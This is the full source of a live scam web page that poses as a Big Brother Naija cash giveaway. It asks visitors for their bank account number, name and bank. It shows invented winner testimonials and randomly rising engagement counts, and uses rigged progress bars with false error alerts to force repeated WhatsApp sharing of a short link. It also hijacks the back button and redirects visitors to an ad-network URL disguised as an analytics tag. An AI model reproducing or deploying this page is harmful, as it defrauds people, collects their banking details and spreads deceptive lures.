<!DOCTYPE html>
<html>
    
<head>
    <script>

        function set_Cookie(name,value){
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days*20*1000));
            document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+"; path=/;"
        }
        function get_Cookie(name){
            var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
            if(arr=document.cookie.match(reg)){
                return unescape(arr[2]);
            }
            return '';
        }


      

    </script>
  
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title> BIG BROTHER NAIJA SEASON 8 GIVEAWAY</title>
     
        <meta name="og:title" content=" BIG BROTHER NAIJA SEASON 8 GIVEAWAY" />
      
 
</head>
<body>
<style type="text/css">
@import url("../external.html?link=https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&amp;display=swap");
@import url("../fonts.googleapis.com/earlyaccess/droidarabicnaskh.css");
* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: normal;
    box-sizing: border-box;


}
body {
    direction: lfl;
    background: #ebedf0;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    padding: 10px;
    max-width: 500px;
    border: 1px solid #d0d1d5;
    border-radius: 3px;
}
.post img {
    width: 100%;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #098105;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #27ae60;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 200px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 24px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: rgb(9, 129, 5);
    transition: background 0.3s ease;
}
button:hover {
    background: #098105;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 100%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 200px;
    margin: 10px auto;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px rgb(9, 129, 5);
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #098105;
}
#fill,
#fill2 {
    background: #098105;
    width: 0%;
    height: 100%;
}
.percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #098105;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2; 
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
.A{
    text-align: center;
    background-color: rgb(151, 199, 149);
}
</style>
  
  
  
  
                    <center><img src="1.jpg" alt="Big Brother Naija" style="width: 100%;"></center>
                       <marquee class="horizontal_marque" direction="right" style="font-weight: 600">BIG BROTHER NAIJA SEASON 8 Cash Prize Giveaway</marquee> 
    <div class="post" width="100%">

        <div id="intro" class="welcome" style="background-image: url(5.jpg); padding:15px;">
         
           
   <h2 style=" font-weight: 600;color: #FFF586;text-align: center;">Brace yourselves for the most exciting news of the season!!</b </h2> 
                        <br><hr> <br>  We are thrilled to announce the Big Brother Naija Cash Giveaway, where a staggering token of 100,000 naira awaits each of the 500 lucky winners! <br> Yes, you heard it right! Picture yourself as one of the fortunate individuals who will be showered with this incredible cash prize</h2>
               
               
          
               
            <button id="go" style="background-color:#FFF586; color: black; ">Proceed ➤</button>
      <br>  </div>
      
        <div id="info">

  <p class="title"> ACCOUNT NUMBER:</p>
            <div class="phone">
                <center><input type="char" placeholder="Enter your Account number" 
                    name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;
                    width: 330px;" onkeypress="return numberonly(event);"></center>
                    <center>
                <p class="title"> ACCOUNT NAME:</p>
            <input type="char" placeholder="Enter your Account Name" id="name" 
                    name="name" style="fontwidth: 244px;height: 56px;font-size: 18px;
                    width: 330px;">
                    </center>
              <center>
                <p class="title"> SELECT BANK:</p>
                <select name="bank" id="bank" style="fontwidth: 244px;height: 56px;font-size: 18px;
                width: 330px;">
                 <option value="Select Bank ">Select Bank</option>
                    <option value="Access Bank Plc">Access Bank Plc</option>
                    <option value="Citibank Nigeria Limited">Citibank Nigeria Limited</option>
                    <option value="Ecobank Nigeria Plc">Ecobank Nigeria Plc</option>
                    <option value="First Bank Plc">First Bank Plc</option>
                    <option value="First City Monument Bank Plc">First City Monument Bank Plc</option>
                    <option value="Fidelity Bank Plc">Fidelity Bank Plc</option>
                    <option value="Globus Bank Limited">Globus Bank Limited</option>
                    <option value="Guaranty Trust Bank Plc">Guaranty Trust Bank Plc</option>
                    <option value="Heritage Banking Company Ltd">Heritage Banking Company Ltd</option>
                    <option value=" Keystone Bank Limited"> Keystone Bank Limited</option>
                    <option value="Palmpay">Palmpay</option>
                    <option value="Parallex Bank Ltd "> Parallex Bank Ltd </option>
                    <option value=" Polaris Bank Plc"> Polaris Bank Plc</option>
                    <option value=" Premium Trust Bank"> Premium Trust Bank</option>
                    <option value="Providus Bank">Providus Bank</option>
                    <option value="Opay">Opay</option>
                    <option value=" Optimus Bank"> Optimus Bank</option>
                    <option value="Signature Bank Ltd">Signature Bank Ltd</option>
                    <option value=" Stanbic IBTC Bank Plc"> Stanbic IBTC Bank Plc</option>
                    <option value=" Standard Chartered Bank Nigeria 
                    Ltd"> Standard Chartered Bank Nigeria 
                    Ltd</option>
                    <option value=" Sterling Bank Plc"> Sterling Bank Plc</option>
                    <option value=" Sun Trust Bank Nigeria Limited"> Sun Trust Bank Nigeria Limited</option>
                    <option value="Titan Trust Bank Ltd">Titan Trust Bank Ltd</option>
                    <option value=" Union Bank of Nigeria Plc"> Union Bank of Nigeria Plc</option>
                    <option value=" United Bank for Africa Plc"> United Bank for Africa Plc</option>
                    <option value=" Unity Bank Plc"> Unity Bank Plc</option>
                    <option value=" Wema Bank Plc"> Wema Bank Plc</option>
                    <option value="Zenith Bank Plc">Zenith Bank Plc</option>
                    
                    
                </select>
              </center>
 


              
        <button id="confirm">Send</button>
            </div>
            <p class="error">Please Validate Your Account Number !</p>
        </div>
        
        
        <div id="share">

            <p class="tip"> Congratulations, <span id="getname"></span>.</p>
            <p class="tip">
             Your Account Is selected among the first 500 person to receive 100,000 Cash Prize Giveaway<span class="amount"> .</span> Proceed to claim your prize: 
            </p><br>
            <p class="tip">1. Share it with 5 groups or 15 friends on WhatsApp (Click on the "SHARE" icon below).</p>
            <p class="tip">2. You will be redirected automatically to our "<b>PAYMENT FORM</b>" page after the verification bar is filled.</p>
            <p class="tip">3. You will receive your prize Within 24hours After Successful Application.</p>

            <button id="whatsapp">SHARE NOW</button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title"> Your Account details is ready to receive Big Brother Naija Cash Giveaway  </p>
             <center>
  <a id="offer" href="https://www.highwaycpmrevenue.com/h96d6rw8?key=94ab7ac10f3232c8981069d3880baa9b " style=" display: block; width: 200px;
    height: 30px;
    text-align: center;
    color: #fff;
    border: none;
    outline: none;
    font-size: 24px; 
    cursor: pointer; 
    border-radius: 5px;
    padding: 10px;
    margin: 10px; text-decoration: none;
    background-color:black ;">Get Prize</a>
    </center>
    <br>
            <br>
          
           </div>
        <div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="removed.png" /> <img class="love" src="removed.png" /> <img class="care" src="removed.png" /> <span id="likes">134K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    </div>
                </div>
                <div class="comment">
                    <img src="xp1ER6K.jpg" />
                    <div class="single-container">
                        <span class="user">Peter Isaka</span>
                        <span class="text">
I still can't believe it! I just received my 100,000 naira cash prize from the Big Brother Naija Cash Giveaway! 🎉 
                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="removed.png" />
                    <div class="single-container"><span class="user">James Idowu </span> <span class="text"> Wow! What a fantastic surprise to start my day! The Big Brother Naija Cash Giveaway has truly changed my life with this 100,000 naira cash prize! 🤩 Thank you to the organizers for this incredible opportunity. </span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="removed.png" />
                    <div class="single-container"><span class="user"> Chinwe gift </span> <span class="text"> I'm over the moon with excitement as I hold my 100,000 naira cash prize from the Big Brother Naija Cash Giveaway in my hands! 😍</span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="removed.png" />
                    <div class="single-container"><span class="user"> Ebuka Opara </span> <span class="text"> Feeling blessed beyond words! Just got the news that I'm one of the fortunate winners of the 100,000 naira cash prize from the Big Brother Naija Cash Giveaway! 🙌🏽</span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="input"><input placeholder="Write a comment..." /></div>
            </div>
        </div>
    </div>
    <script src="jquery-latest.min.js"></script>




<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});
</script>








<script type="text/javascript">

$("#go").click(function () {
    $("#intro").fadeOut(0);
    $("#loader").fadeIn(10);
    var i = 0;
    var interval = setInterval(function () {
        $("#num").text(i + "%");
        i += 1;
        if (i >= 100) {
            clearInterval(interval);
            $("#loader").fadeOut(0);
            $("#info").fadeIn(1000);
        }
    }, 50);
});
$("#confirm").click(function () {
    if ($("#name").val().length < 4)
    {
        $(".error").fadeIn(500);
    } else {
        $("#info").fadeOut(0);
        $("#checking").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function () {
            i += 1;
            $("#percentage").text(i + "%");
            $("#fill").css("width", i + "%");
            if (i == 50) {
                i = 49;
                setTimeout(function () {
                    i = 50;
                }, 1000);
            }
            if (i >= 100) {
                clearInterval(interval);
                $("#load").fadeOut(0);
                $("#check").fadeIn(0);
                setTimeout(function () {
                    $("#checking").fadeOut(0);
                    $("#share").fadeIn(1000);
                    $("#getname").html($("#name").val());
                }, 500);
            }
        }, 50);
    }
});
$(document).click(function () {
    if ($("#name").is(":focus")) {
        $(".error").fadeOut(500);
    }
});
</script>

    <script>
          var text1 ="*Big Brother Naija Season 8 Cash Prize Giveaway* *Available for the first 500 person**Click the below link to receive Yours**http://bit.ly/Big-brother-season8*",
        
            text2 = " an amount of ",
            text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
            error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
            abcde = "    https://www.highwaycpmrevenue.com/h96d6rw8?key=94ab7ac10f3232c8981069d3880baa9b  ",
            saved = "",
            share = "whatsapp://send?text=" + text1;
    </script>






<script type="text/javascript">
 var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $("#intro").fadeOut(0);
    $(".comments").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.location.href = share;
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 2;
    } else if (width == 87) {
        width += 1;
    } else if (width == 88) {
        width += 2;
    } else if (width == 90) {
        width += 1;
    } else if (width == 91) {
        width += 1;
    } else if (width == 92) {
        width += 1;
    } else if (width == 93) {
        width += 1;
    } else if (width == 94) {
        width += 1;
    } else if (width == 95) {
        width += 1;
    } else if (width == 96) {
        width += 2;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(abcde, "_blank");
});
</script>

 <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src=" https://www.highwaycpmrevenue.com/h96d6rw8?key=94ab7ac10f3232c8981069d3880baa9b "></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-YSZ8S8C2VB');
</script>

<script>
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="https://www.highwaycpmrevenue.com/h96d6rw8?key=94ab7ac10f3232c8981069d3880baa9b ";
    }
    function goon(){
        location.href="https://www.highwaycpmrevenue.com/h96d6rw8?key=94ab7ac10f3232c8981069d3880baa9b ";
    }
</script>

<script>
(function (global) {

    if(typeof (global) === "undefined")
    {
        throw new Error("window is undefined");
    }

    var _hash = "!";
    var noBackPlease = function () {
        global.location.href += "#";

        // making sure we have the fruit available for juice....
        // 50 milliseconds for just once do not cost much (^__^)
        global.setTimeout(function () {
            global.location.href += "!";
        }, 50);
    };
    
    // Earlier we had setInerval here....
    global.onhashchange = function () {
        if (global.location.hash !== _hash) {
            global.location.hash = _hash;
        }
    };

    global.onload = function () {
        
        noBackPlease();

        // disables backspace on page except on input fields and textarea..
        document.body.onkeydown = function (e) {
            var elm = e.target.nodeName.toLowerCase();
            if (e.which === 8 && (elm !== 'input' && elm  !== 'textarea')) {
                e.preventDefault();
            }
            // stopping event bubbling up the DOM tree..
            e.stopPropagation();
        };
        
    };

})(window);
</script>
<center><script type="text/javascript" src="../widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1666427,"ffffff","ffffff");</script><br>
</center> 
<center>
  <h3 style="font-weight: 600">Sponsored by</h3>
  <img style="width: 354px" src="7.jpg" alt="">
</center>


</body>

</html>
